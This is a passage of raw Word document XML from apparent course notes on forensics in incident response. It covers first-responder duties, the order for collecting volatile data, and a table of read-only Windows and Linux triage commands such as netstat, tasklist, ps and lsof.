        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 6 — Post-Incident Activity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After the emergency, hold a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">lessons-learned meeting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: what happened, how well did we respond, what slowed us down, what should change? Update the IR plan and playbooks, improve controls and detections, record </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">metrics</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (time to detect, contain, recover), and finish the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This feeds the next cycle of preparation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 How Forensics Integrates with Incident Response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IR phase</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Forensic contribution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Preparation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Forensic readiness: logging, time sync, forensic tools and trained staff, evidence-handling procedures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Detection &amp; analysis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Artefact analysis to confirm compromise, find patient zero, determine scope, produce IOCs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Containment</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Preserve volatile and disk evidence </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">before</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> isolating or rebuilding; document every action</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Eradication</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Identify all persistence mechanisms and the initial entry point so that nothing is missed</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Recovery</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Validate that restored systems are clean; hash-check backups; monitor IOCs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Post-incident</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Timeline, root-cause analysis, final forensic report, support for legal action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ From incident to final report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rPr>
          <w:cantSplit/>
        </w:trPr>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Security event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Detect &amp; analyse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Contain + preserve evidence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Eradicate &amp; recover</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Forensic analysis &amp; timeline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Report &amp; recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 First Responder Responsibilities and Preserving Volatile Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsibilities of the first responder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure the scene</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and keep unauthorised people away from systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document first, interact second</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — photograph screens, note running state, connected devices, network state, time (see Unit I).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> shut the machine down, log off, run clean-up tools, or browse files on the live system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> quickly with the incident manager: isolate from the network? capture memory? image now or later?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Collect volatile data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the correct order using trusted tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start chain of custody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for everything collected; hand over to the forensic team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Communicate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only through the defined channel; avoid discussing details on a possibly compromised network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Collecting volatile data during a live incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">trusted toolkit on external media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not the suspect’s own tools, which may be replaced by an attacker), and write output to external storage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record the current </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">date and time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and time zone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture RAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FTK Imager, Belkasoft RAM Capturer, DumpIt, LiME for Linux).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">network connections and ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, logged-in users and sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">list of running processes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, services, loaded modules and open files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Record </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ARP cache, DNS cache, routing table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and network configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Collect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scheduled tasks/cron jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, start-up items and recent logs as needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash every output file; log every command you ran and the time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Only then decide on isolation, shutdown and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">disk imaging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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42"/>
        <w:gridCol w:w="3752"/>
        <w:gridCol w:w="3752"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Windows commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Linux commands</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Date / uptime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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date /t &amp; time /t</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net statistics workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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date</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uptime</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 connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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netstat -ano</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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ss -tunap</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netstat -antup</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Processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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tasklist /v</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tasklist /svc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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ps auxf</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top -b -n1</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Logged-in users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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query user</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net session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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who</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w</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last</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 config / ARP / DNS cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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ipconfig /all</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arp -a</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ipconfig /displaydns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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ip a</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ip neigh</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ip route</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Open files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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(Sysinternals) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">handle.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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lsof -n</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Scheduled tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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schtasks /query /fo LIST /v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3752"/>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crontab -l</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ls /etc/cron*</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Remember</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Every command you run on a live machine </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">changes it a little</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. That is acceptable only if you follow the order of volatility, use trusted tools, keep the footprint minimal and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">document everything</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
